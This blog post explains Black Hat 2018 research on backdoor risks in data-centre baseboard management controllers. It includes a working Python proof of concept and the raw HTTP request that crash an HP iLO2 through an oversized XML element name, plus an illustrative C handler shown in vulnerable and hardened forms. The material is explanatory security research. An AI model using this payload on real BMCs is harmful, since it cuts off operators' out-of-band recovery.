Data Centre Backdoors

Written by:
Hyve
Date Posted:
10 August 2018

The move to the cloud has made data centres a vital part of enterprise life. Yet the remote management interfaces built into servers can also give an attacker a simple route onto those servers.

Baseboard Management Controllers (BMCs) are used in most organisations as a dedicated channel for server maintenance. They give sysadmins the ability to remotely monitor power consumption, system temperature, fan speed and chassis health.

The most important BMC capabilities are those that allow remote access to, and configuration of, the server: remotely rebooting it, and opening a direct serial connection or a KVM (Keyboard, Video and Mouse) session to its console. Combined with network protocols such as IPMI, SSH and VNC, this makes the BMC the natural tool for both remote administration and disaster recovery. It is accordingly widely deployed on Out Of Band (OOB) management networks, and in data centres in particular, to minimise on-site administration.

New Research

In a new paper presented at Black Hat USA yesterday, security researchers Matias Soler and Nicolas Waisman showed how BMCs can be used nefariously.

They describe how they found three critical vulnerabilities in the most popular BMC devices from the largest suppliers, each allowing remote compromise of the device. They demonstrate these attacks and show how a compromised BMC becomes the perfect backdoor.

Every major server vendor ships some kind of BMC with its servers: Dell has the Integrated Dell Remote Access Controller (iDRAC), Lenovo and IBM the Integrated Management Module (IMM), and HP the Integrated Lights-Out (iLO). Alongside standard IPMI, they mostly rely on vendor-specific protocols and firmware.

You’re not as safe as you thought you were

It was widely assumed that because the BMC sits behind several layers of network security it was safe. But the BMC straddles both sides: it is attached to the management network and, through the host's local IPMI interface, to the host itself. Compromise can therefore move in both directions, from host to BMC and from BMC to host.

The paper states:

An attacker with privileged access to a host can compromise its BMC even if it is fully patched, without the need for credentials, thus providing them with a foothold on the management network. An attacker with a foothold on the management network that finds a vulnerable BMC or has credentials to one, can compromise its host.

The core problem is that once an attacker is inside a data centre network, the weaknesses inherent in BMC technology can be used to take control of further systems and to install malware that persists across reboots and even a reinstall of the host operating system, because it lives in the BMC rather than on the host's disks.

One example of a possible attack follows. The request below, sent to an iLO2, triggers the vulnerability and crashes the BMC processor. The Python script uses the requests library; the raw HTTP request it produces is shown after it.

import requests

# Proof-of-concept from the paper: an oversized XML element name in a
# WS-Management request. Sending it to a vulnerable iLO2 crashes the BMC.
headers = {'Content-Type': 'application/soap+xml;charset=UTF-8'}

# "<x:" followed by 0x300 (768) bytes of 'B', then the closing tag
payload = "<x:" + "B" * 0x300 + ">\n</x>"

# verify=False: BMCs almost always present a self-signed certificate
r = requests.post('https://192.168.1.250/wsman', data=payload, verify=False,
                  headers=headers)

print(r.text)

Request:

POST /wsman HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MSBrowserIE; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: xxxxx
Content-Length: 792
Content-Type: application/soap+xml;charset=UTF-8

<x:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB>
</x>

Once the request is sent, the iLO2 stops responding altogether: ping, the web console, SSH and telnet all go offline. Because the BMC is a separate processor, the host operating system keeps running; what is lost is the out-of-band path an operator would rely on to recover the machine remotely.
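The post shows only the trigger, not the bug class behind it. The paper's conclusion, quoted below, puts it down to sprintf-based stack overflows in BMC firmware. The following C is an added illustration, not code from Hyve's post or from Soler and Waisman's paper: a hypothetical WS-Man request handler that copies the XML element name after the first `<` into a fixed-size stack buffer, shown in its vulnerable form and in a hardened form that rejects names that do not fit. The buffer size TAG_NAME_MAX (64), the function names and the -1 "reject" code are assumptions for illustration; the PoC body is constructed in the same shape as the page's payload ("<x:" plus 0x300 bytes of B).

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not code from Hyve's post or from Soler and Waisman's
 * paper.  A hypothetical WS-Man request handler copies the XML element name
 * that follows the first '<' into a fixed-size stack buffer, the sprintf-based
 * stack overflow pattern the paper's conclusion complains about.  TAG_NAME_MAX,
 * the function names and the -1 "reject" code are assumptions. */

#define TAG_NAME_MAX 64   /* assumed size of the firmware's stack buffer */

/* Length of the element name starting right after '<' and ending at the first
 * '>', whitespace or end of input.  0 if the body does not begin with '<'.
 * Shared by both handlers so that they differ only in how they copy. */
size_t tag_name_len(const char *body)
{
    if (body == NULL || body[0] != '<')
        return 0;
    return strcspn(body + 1, "> \t\r\n");
}

/* Auditor's check: does this body overflow the vulnerable handler's buffer?
 * The NUL terminator needs one byte, so a name of TAG_NAME_MAX already spills. */
int would_overflow(const char *body)
{
    return tag_name_len(body) >= TAG_NAME_MAX;
}

/* VULNERABLE: the destination size never enters the sprintf call.  Safe to call
 * only when would_overflow(body) == 0; with the 0x300-byte name from the post
 * it writes past 'name' and corrupts the stack, which is the crash the post
 * describes.  Returns the name length, or -1 for a body without a '<'. */
int handle_wsman_vulnerable(const char *body)
{
    char name[TAG_NAME_MAX];
    size_t n = tag_name_len(body);
    if (n == 0)
        return -1;
    sprintf(name, "%.*s", (int)n, body + 1);   /* bounded by n, not by sizeof name */
    return (int)strlen(name);
}

/* HARDENED: the length is checked against the buffer before any byte is copied,
 * the copy itself is bounded by snprintf, and an oversized name is rejected (-1)
 * rather than silently truncated, so the caller can log and drop the request. */
int handle_wsman_hardened(const char *body)
{
    char name[TAG_NAME_MAX];
    size_t n = tag_name_len(body);
    if (n == 0 || n >= sizeof name)
        return -1;
    int written = snprintf(name, sizeof name, "%.*s", (int)n, body + 1);
    if (written < 0 || (size_t)written >= sizeof name)
        return -1;
    return written;
}

/* Constructs the post's PoC body "<x:" + repeat * 'B' + ">\n</x>" into out.
 * Returns the body length, or 0 if it would not fit in cap bytes. */
size_t build_poc_body(char *out, size_t cap, size_t repeat)
{
    const char *head = "<x:", *tail = ">\n</x>";
    size_t need = strlen(head) + repeat + strlen(tail) + 1;   /* +1 for NUL */
    if (cap < need)
        return 0;
    memcpy(out, head, strlen(head));
    memset(out + strlen(head), 'B', repeat);
    memcpy(out + strlen(head) + repeat, tail, strlen(tail) + 1);
    return need - 1;
}

/* Whether the vulnerable handler would overflow on a PoC with 'repeat' B's
 * (-2 if the PoC is too large for this demo's 1024-byte buffer). */
int poc_would_overflow(size_t repeat)
{
    char body[1024];
    if (build_poc_body(body, sizeof body, repeat) == 0)
        return -2;
    return would_overflow(body);
}

/* The hardened handler's verdict on a PoC with 'repeat' B's: the accepted
 * name length, -1 if rejected, -2 if the PoC does not fit the demo buffer. */
int hardened_verdict_for_poc(size_t repeat)
{
    char body[1024];
    if (build_poc_body(body, sizeof body, repeat) == 0)
        return -2;
    return handle_wsman_hardened(body);
}

int main(void)
{
    char body[1024];
    size_t len = build_poc_body(body, sizeof body, 0x300);
    printf("PoC body %zu bytes, element name %zu bytes, %d-byte buffer, overflow: %s\n",
           len, tag_name_len(body), TAG_NAME_MAX, would_overflow(body) ? "yes" : "no");
    printf("hardened handler on PoC: %d (rejected)\n", handle_wsman_hardened(body));
    const char *benign = "<x:foo>\n</x>";   /* constructed benign request */
    printf("benign body: vulnerable=%d hardened=%d\n",
           handle_wsman_vulnerable(benign), handle_wsman_hardened(benign));
    return 0;
}
```

The boundary matters: a 63-byte name is the longest the hardened handler accepts, because the 64th byte of the buffer is the terminator, and would_overflow() uses the same `>=` comparison so the audit check and the fix cannot drift apart. Note that the hardened version rejects rather than truncates; truncating an attacker-shaped element name and carrying on is how a parser ends up processing a request it never validated.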

The paper concluded:

From an offensive perspective, even though the various BMC platforms may require significant research investments, the results are worth the endeavour. A culture of empirically proven low-quality vendor software makes BMCs a prime target. BMCs can facilitate long term persistence as well as cross-network movement that bypasses most network security design. It is very hard, if not impossible, for any sufficiently sized company to move away from BMCs. As such, it is time for BMC vendors to revisit 2002, read the famous Trustworthy Computing memo and realize that anno 2018 sprintf based stack overflows really should be a thing of the past in any platform that supports mission critical infrastructure.